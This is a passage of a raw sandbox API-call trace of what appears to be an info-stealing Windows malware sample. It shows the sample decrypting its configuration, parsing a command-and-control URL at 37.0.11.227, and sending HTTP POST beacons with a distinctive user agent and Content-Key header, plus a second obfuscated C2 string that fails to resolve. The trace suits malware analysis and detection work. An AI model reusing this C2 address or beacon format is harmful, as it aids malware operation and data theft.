lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0178.175] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.175] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0178.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.177] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0178.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.179] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0178.179] GetProcessHeap () returned 0x690000 [0178.179] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0178.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.181] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0178.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.182] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0178.182] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.183] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0178.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.184] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0178.184] GetProcessHeap () returned 0x690000 [0178.184] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0178.184] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9e88*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0178.184] GetProcessHeap () returned 0x690000 [0178.184] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4b0 [0178.184] socket (af=2, type=1, protocol=6) returned 0x2b8 [0178.184] connect (s=0x2b8, name=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0178.219] FreeAddrInfoW (pAddrInfo=0x6a9e88*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0178.219] GetProcessHeap () returned 0x690000 [0178.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0178.219] GetProcessHeap () returned 0x690000 [0178.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0178.220] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0178.221] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0178.221] GetProcessHeap () returned 0x690000 [0178.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a92a0 [0178.221] GetProcessHeap () returned 0x690000 [0178.222] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0178.222] GetProcessHeap () returned 0x690000 [0178.222] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0178.222] GetProcessHeap () returned 0x690000 [0178.222] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0178.223] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0178.224] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0178.224] GetProcessHeap () returned 0x690000 [0178.224] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0178.224] GetProcessHeap () returned 0x690000 [0178.225] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0178.225] send (s=0x2b8, buf=0x6abd08*, len=242, flags=0) returned 242 [0178.226] send (s=0x2b8, buf=0x6aba40*, len=159, flags=0) returned 159 [0178.226] GetProcessHeap () returned 0x690000 [0178.226] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6ad790 [0178.226] recv (in: s=0x2b8, buf=0x6ad790, len=4048, flags=0 | out: buf=0x6ad790*) returned 204 [0178.306] GetProcessHeap () returned 0x690000 [0178.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0178.307] GetProcessHeap () returned 0x690000 [0178.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0178.307] GetProcessHeap () returned 0x690000 [0178.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a92a0 | out: hHeap=0x690000) returned 1 [0178.307] GetProcessHeap () returned 0x690000 [0178.308] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0178.308] closesocket (s=0x2b8) returned 0 [0178.309] GetProcessHeap () returned 0x690000 [0178.309] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4b0 | out: hHeap=0x690000) returned 1 [0178.309] GetProcessHeap () returned 0x690000 [0178.310] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0178.310] GetProcessHeap () returned 0x690000 [0178.310] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0178.310] GetProcessHeap () returned 0x690000 [0178.310] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0178.311] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6ad790, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1394) returned 0x2b8 [0178.312] Sleep (dwMilliseconds=0xea60) [0178.314] GetProcessHeap () returned 0x690000 [0178.314] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0178.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.315] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0178.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.465] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0178.481] GetProcessHeap () returned 0x690000 [0178.481] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0178.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.485] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0178.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.486] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0178.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.487] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0178.487] GetProcessHeap () returned 0x690000 [0178.488] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0178.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.489] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0178.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.490] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0178.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.491] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0178.491] GetProcessHeap () returned 0x690000 [0178.491] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0178.492] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.492] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0178.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.496] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0178.497] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.497] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0178.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.499] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0178.499] GetProcessHeap () returned 0x690000 [0178.499] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0178.499] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0178.499] GetProcessHeap () returned 0x690000 [0178.500] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0178.500] GetProcessHeap () returned 0x690000 [0178.500] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0178.500] GetProcessHeap () returned 0x690000 [0178.501] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0178.501] GetProcessHeap () returned 0x690000 [0178.501] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0178.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.502] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0178.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.510] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0178.520] GetProcessHeap () returned 0x690000 [0178.520] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0178.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.521] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0178.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.522] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0178.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.524] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0178.524] GetProcessHeap () returned 0x690000 [0178.524] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0178.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.526] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0178.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.529] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0178.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.531] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0178.531] GetProcessHeap () returned 0x690000 [0178.531] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0178.532] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.532] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0178.533] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.534] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0178.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.535] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0178.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.536] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0178.536] GetProcessHeap () returned 0x690000 [0178.536] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0178.536] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6adea0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae928*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0178.537] GetProcessHeap () returned 0x690000 [0178.537] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0178.537] socket (af=2, type=1, protocol=6) returned 0x2bc [0178.537] connect (s=0x2bc, name=0x6ae928*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0178.570] FreeAddrInfoW (pAddrInfo=0x6adea0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae928*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0178.570] GetProcessHeap () returned 0x690000 [0178.570] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0178.570] GetProcessHeap () returned 0x690000 [0178.570] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0178.574] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0178.575] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0178.575] GetProcessHeap () returned 0x690000 [0178.575] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a92a0 [0178.575] GetProcessHeap () returned 0x690000 [0178.575] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0178.576] GetProcessHeap () returned 0x690000 [0178.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0178.576] GetProcessHeap () returned 0x690000 [0178.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0178.576] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0178.577] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0178.577] GetProcessHeap () returned 0x690000 [0178.578] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0178.578] GetProcessHeap () returned 0x690000 [0178.578] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0178.578] send (s=0x2bc, buf=0x6abd08*, len=242, flags=0) returned 242 [0178.579] send (s=0x2bc, buf=0x6aba40*, len=159, flags=0) returned 159 [0178.579] GetProcessHeap () returned 0x690000 [0178.579] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6af418 [0178.579] recv (in: s=0x2bc, buf=0x6af418, len=4048, flags=0 | out: buf=0x6af418*) returned 204 [0178.713] GetProcessHeap () returned 0x690000 [0178.714] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0178.714] GetProcessHeap () returned 0x690000 [0178.714] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0178.714] GetProcessHeap () returned 0x690000 [0178.714] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a92a0 | out: hHeap=0x690000) returned 1 [0178.714] GetProcessHeap () returned 0x690000 [0178.715] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0178.715] closesocket (s=0x2bc) returned 0 [0178.717] GetProcessHeap () returned 0x690000 [0178.717] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0178.717] GetProcessHeap () returned 0x690000 [0178.717] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0178.717] GetProcessHeap () returned 0x690000 [0178.717] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0178.717] GetProcessHeap () returned 0x690000 [0178.718] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0178.718] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6af418, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x5d0) returned 0x2bc [0178.720] Sleep (dwMilliseconds=0xea60) [0178.806] GetProcessHeap () returned 0x690000 [0178.806] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0178.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.807] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0178.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.814] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0178.823] GetProcessHeap () returned 0x690000 [0178.823] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0178.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.824] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0178.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.825] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0178.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.841] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0178.841] GetProcessHeap () returned 0x690000 [0178.842] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0178.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.843] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0178.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.844] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0178.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.845] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0178.845] GetProcessHeap () returned 0x690000 [0178.845] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0178.846] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.846] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0178.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.847] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0178.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.849] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0178.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.850] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0178.850] GetProcessHeap () returned 0x690000 [0178.850] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0178.850] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0178.851] GetProcessHeap () returned 0x690000 [0178.851] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0178.851] GetProcessHeap () returned 0x690000 [0178.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0178.852] GetProcessHeap () returned 0x690000 [0178.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0178.852] GetProcessHeap () returned 0x690000 [0178.852] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0178.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.853] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0178.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.858] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0178.865] GetProcessHeap () returned 0x690000 [0178.865] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0178.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.866] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0178.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.867] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0178.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.868] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0178.868] GetProcessHeap () returned 0x690000 [0178.868] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0178.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.869] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0178.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.872] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0178.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.872] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0178.873] GetProcessHeap () returned 0x690000 [0178.873] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0178.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.873] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0178.874] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.875] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0178.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.875] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" 